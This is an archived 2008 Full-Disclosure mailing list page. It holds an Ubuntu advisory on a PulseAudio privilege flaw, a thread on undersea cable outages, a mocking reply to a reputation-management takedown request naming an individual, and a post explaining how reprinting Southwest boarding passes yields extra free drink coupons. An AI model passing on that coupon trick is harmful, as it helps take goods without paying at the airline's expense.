Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [USN-573-1] PulseAudio vulnerability

2008-01-31 Thread Jamie Strandboge
=== 
Ubuntu Security Notice USN-573-1   January 31, 2008
pulseaudio vulnerability
CVE-2008-0008
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.04:
  pulseaudio  0.9.5-5ubuntu4.2

Ubuntu 7.10:
  pulseaudio  0.9.6-1ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that PulseAudio did not properly drop privileges
when running as a daemon. Local users may be able to exploit this
and gain privileges. The default Ubuntu configuration is not
affected.


Updated packages for Ubuntu 7.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.2.diff.gz
  Size/MD5:17449 6b56fc19d1df82cfdced55206ef64679

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.2.dsc
  Size/MD5: 1265 a82ede30ebdafce09d266b6dd1cfe5b7

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5.orig.tar.gz
  Size/MD5:  1145930 99b5d9efd4fce35cabb4ae5d0ebb230d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-browse0_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:11500 ce80e767d1e30f8de6fd2ee6a2ed548c

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-dev_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:   181184 e3bda5b5754b975f7578462f7100de29

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:11570 da9e293b1f61b6cf225ba70b07efdeb1

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse0_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:   111218 e8631760459aadaeed2d0f9c42890f80

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio-esound-compat_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:27466 d4f6159b05f56e0a6d51a9f3f2af711e

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:   331220 d15cdd578190859a61588cfd69107e27

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-gconf_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:12856 9cba1bcd4c384a8ef902a82c005613cf

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-hal_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:14880 8b4edc9db568a25a347d8e0acce0276d

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-lirc_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5: 9246 b20f4744d8b6b53286af6feac8bb3cbd

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-x11_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:16188 c8dd2744ec424684f20959940b263a83

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-zeroconf_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:14592 5e20ed3a3ee9bc8d2e12db5066eb8bca

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-utils_0.9.5-5ubuntu4.2_amd64.deb
  Size/MD5:52792 ce4718ea982640fc8a953231d3f564ec

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-browse0_0.9.5-5ubuntu4.2_i386.deb
  Size/MD5:10830 24ae5b0dc91be5dfc3791ac9ba6acfdc

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-dev_0.9.5-5ubuntu4.2_i386.deb
  Size/MD5:   159190 4dc619974dcb7cdeb87969859d7e27df

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.5-5ubuntu4.2_i386.deb
  Size/MD5:10996 5c1bb793bc86ddfbbc8480d22e9428f6

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse0_0.9.5-5ubuntu4.2_i386.deb
  Size/MD5:   100172 fd40e44f9345de1492cb1efa4ff68c77

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio-esound-compat_0.9.5-5ubuntu4.2_i386.deb
  Size/MD5:25660 630da63c98812f52ba98f15f285f3226

http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.2_i386.deb
  Size/MD5:   295640 df569af31b96c7d658921c05c2bbe880

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-gconf_0.9.5-5ubuntu4.2_i386.deb
  Size/MD5:12230 da658350c189df71ca7337ba48f8a5a8

http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-hal_0.9.5-5ubuntu4.2_i386.deb
  Size/MD5:13746 9928dc07ff1782d509eccfb7d10bd342


Re: [Full-disclosure] back to high value targets

2008-01-31 Thread coderman
On Jan 31, 2008 12:35 PM, gmaggro [EMAIL PROTECTED] wrote:
 ...
 And a quip from the article that just tickles me pink: ...The outage,
 which is being blamed on a fault in a single undersea cable...

two cables:
FLAG Europe-Asia and SeaMeWe-4


 This is all assuming that the story is true; that it is one cable, and
 not a cover for something else. Glomar Explorer and K-129 anyone? Maybe
 they're just patching in another Echelon node, hehe :)

you'd be surprised how often trawlers, boat anchors, cable scavengers
(yes, really!) and even marine life sever under sea cables... or maybe
you wouldn't.

no need to attribute to skilled malice (NSA taps from the undersea bay
of the Jimmy Carter sub fiber splicing deck) what is easily
accomplished via sheer stupidity or carelessness or simple bad luck.


 Doesn't really matter how or why the damage occurred, the point is that
 fairly massive single points of failure clearly exist.

rarely single points, but pairs or small groups.  the moment you get a
good pair of failures in a critical link, you often see cascading
failures, and it turns into a cyclone of crap hitting fans.. whee


 What does matter
 is how similar results could be replicated by a loose coalition of
 like-minded individuals using highly insecure media.

i wuz just fishin' fur dungeness offisah, didnt mean no harmz to dem cablz!!


 I seriously wonder what the bandwidth of those are.

DWDM can get pretty fat.  the economic incentives to squeeze as much
bandwidth as possible through every single strand makes these the
phattest of the phat pipes, in general.


 On a somewhat related note, it's always been my guess that very little
 net traffic, relatively speaking, is carried over satellites due to the
 distance and lag issues. Is this a foolish notion?

i don't know figures (anyone?) but this tends to be the case.  sats
are great for broadcast relay, but suck for low latency bi-directional
comms.  however, they do make useful backups.  how else are you going
to get data back and forth across the planet when those fibers get
sliced?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] back to high value targets

2008-01-31 Thread coderman
On Jan 31, 2008 2:43 PM, coderman [EMAIL PROTECTED] wrote:
 ...
  On a somewhat related note, it's always been my guess that very little
  net traffic, relatively speaking, is carried over satellites due to the
  distance and lag issues. Is this a foolish notion?

 i don't know figures (anyone?) but this tends to be the case.  sats
 are great for broadcast relay, but suck for low latency bi-directional
 comms.  however, they do make useful backups.  how else are you going
 to get data back and forth across the planet when those fibers get
 sliced?

forgot to mention, they are definitely used for data, i just don't
know how much.  Mentat even provides a dedicated appliance with
modified TCP like reliable stream delivery over sat links to
accommodate the long, wide pipe characteristics of satellite
transport.

your typical TCP stack will severely under-utilize a sat link due to
the latencies involved.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] A friendly request on behalf of Bart Cilfone

2008-01-31 Thread Fredrick Diggle
How much does the reputation Defender charge for to send the emails to
mailing lists begging that they take down bad things about Fredrick
Diggle. He is interested in their services and also for to have them
ban certain libel people from the internets. Is this possible and how
much will it cost Fredrick Diggle? His salary is not high at the zoo
but he would be willing to pay a fair sum.

YAY!

On Jan 28, 2008 12:30 PM, reepex [EMAIL PROTECTED] wrote:
 lol best troll ever



 On 1/28/08, Donald Republic [EMAIL PROTECTED] wrote:
 
 
 
  Dear Full Disclosure,
 
  We are writing to you in behalf of Bart Cilfone. He has asked us to
 contact you and see if you will consider removing the content about him at:
 
  http://seclists.org/fulldisclosure/2008/Jan/0497.html
 
  Please allow us to introduce ourselves. We are ReputationDefender, Inc., a
 company dedicated to helping our clients preserve their good name on the
 Internet. Our founders and employees are all regular Internet users. Like
 our clients, and perhaps like you, we think the Internet is sometimes
 unnecessarily hurtful to the privacy and reputations of everyday people.
 Even content that is meant to be informative can sometimes have a
 significant and negative impact on someone's job prospects, student
 applications, and personal life. We invite you to learn more about who we
 are, at www.reputationdefender.com.
 
  When our clients sign up with our service, we undertake deep research
 about them on the Internet to see what the Web is saying about them. We find
 sites where they are discussed, and we ask our clients how they feel about
 those sites. Sometimes our clients express strong reservations about the
 content on particular websites. They may feel hurt, ashamed, or invaded by
 the content about them on those sites.
 
  As you may know, more and more prospective employers, universities, and
 newfound friends and romantic interests undertake Internet research, and the
 material they find can strongly impact their impressions of the people they
 are getting to know. When people apply for jobs, apply for college or
 graduate school, apply for loans, begin dating, or seek to do any number of
 other things with their lives, hurtful content about them on the Internet
 can have a negative impact on their opportunities. At some point or another,
 most of us say things about ourselves or our friends and acquaintances we
 later regret. We're all human, and we all do it!
 
  We are writing to you today because our client, Bart Cilfone, has told us
 that he would like the content about him on your website to be removed as it
 is outdated and disturbing to him. Would you be willing to remove or alter
 the content? It would mean so much to Mr. Cilfone, and to us. Considerate
 actions such as these will go a long way to help make the Internet a more
 civil place.
 
  Thank you very much for your consideration. We are mindful that matters
 like these can be sensitive. We appreciate your time.
 
  Please let us know if you have removed or changed the content on this site
 by sending an e-mail to: [EMAIL PROTECTED]
 
 
  Yours sincerely,
 
  Donald Republic
  Reputation Defender Service Team
 
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Southwest Airlines Ticket Silliness

2008-01-31 Thread Adam Chesnutt
Not sure if anyone posted this before; But I figured this would interest 
you guys...

Southwest Airlines has a class of ticket called 'Business Select'. This 
ticket typically allows you to board the plane first, and because SWA 
doesn't have assigned seating means you have your pick of the seats on 
the plane. But there is quite an additional benefit.

You also get a free drink ticket. But they seem to have forgotten 
something in the implementation of this: Being your drink coupon is 
issued to you when you print your boarding pass. It's also printed 
whenever you *reprint* your boarding pass!

So if you feel like getting drunk on your flight, just print seven or 
eight boarding passes, and you'll have a good flight. I tried this a 
couple of weeks ago on a flight from San Diego to Kansas City, and I had 
myself 4 free drinks no problem.

Adam


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/